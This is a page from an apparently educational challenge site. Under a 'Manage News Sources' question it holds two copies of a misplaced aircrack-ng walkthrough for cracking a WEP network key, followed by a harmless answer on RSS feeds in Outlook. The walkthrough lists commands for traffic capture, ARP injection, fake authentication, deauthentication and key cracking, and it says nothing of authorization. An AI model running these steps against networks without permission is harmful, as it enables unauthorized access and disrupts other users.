Manage News Sources

Nowadays we can reach lots of information easily, a challenge is to reach the right information and structure it in such a way that you have a good overview on it and don't lose time getting to it.
3 answers

Use aircrack-ng

--This solution had been mistakenly posted to the 'Manage News Sources' challenge (https://techscreen.tuwien.ac.at/node/1365)--

Run the software aircrack-ng under Linux and enter the following commands in the shell:

  • sudo airmon-ng start wlan0 - to start the wlan in promiscuous mode
  • sudo airmon-ng wlan0 - to see all interfaces (mon0, which is monitoring the traffic, appears)
  • sudo airodump-ng wlan0 - to see all traffic, you can find the bssid of the desired network
  • sudo airodump-ng -c 8 --bssid [found bssid] -w output mon0 - capture all traffic with the chosen network and write it inside 'output'
  • sudo aireplay-ng -3 -b [found bssid] mon0 - to send ARP packages to it
  • sudo aireplay-ng --fakeauth 0 -a [found bssid] mon0 - to make fake authentication (to send packages to the wanted network so its key can be cracked afterwards)
  • sudo aireplay-ng --deauth 0 -a [found bssid] mon0 - to make fake deauthentication
  • sudo aircrack-ng output-01.cap - to crack the key (using ~52000 IVs)

Now you should be able to read the network key out of the file.

Taggings:

Use aircrack-ng

--This solution has been moved to the 'Crack WEP' challenge as it had been mistakenly set as solution for managing news sources (https://techscreen.tuwien.ac.at/node/1437).--

Run the software aircrack-ng under Linux and enter the following commands in the shell:

  • sudo airmon-ng start wlan0 - to start the wlan in promiscuous mode
  • sudo airmon-ng wlan0 - to see all interfaces (mon0, which is monitoring the traffic, appears)
  • sudo airodump-ng wlan0 - to see all traffic, you can find the bssid of the desired network
  • sudo airodump-ng -c 8 --bssid [found bssid] -w output mon0 - capture all traffic with the chosen network and write it inside 'output'
  • sudo aireplay-ng -3 -b [found bssid] mon0 - to send ARP packages to it
  • sudo aireplay-ng --fakeauth 0 -a [found bssid] mon0 - to make fake authentication (to send packages to the wanted network so its key can be cracked afterwards)
  • sudo aireplay-ng --deauth 0 -a [found bssid] mon0 - to make fake deauthentication
  • sudo aircrack-ng output-01.cap - to crack the key (using ~52000 IVs)

Now you should be able to read the network key out of the file.

Taggings:

Use RSS News Feed with Outlook

To keep an overview on your news you can use RSS-Feeds and to have all notifications (email, calendars, RSS-Feeds) centralized on one place you can use MS Outlook.
Subscribing to an RSS News Feed and adding it to Outlook can be done easily in two ways. Either by clicking the RSS icon and then choosing 'MS Outlook' in the dropdown menu or by copying the link in your browser after clicking the RSS icon, going to your RSS Feeds Folder in Outlook, selecting 'Add a news feed' in the right mouse button menu and pasting the link there. Then you will be asked for permission to add the news feed andthen you will be able to see news from the feed posted directly there.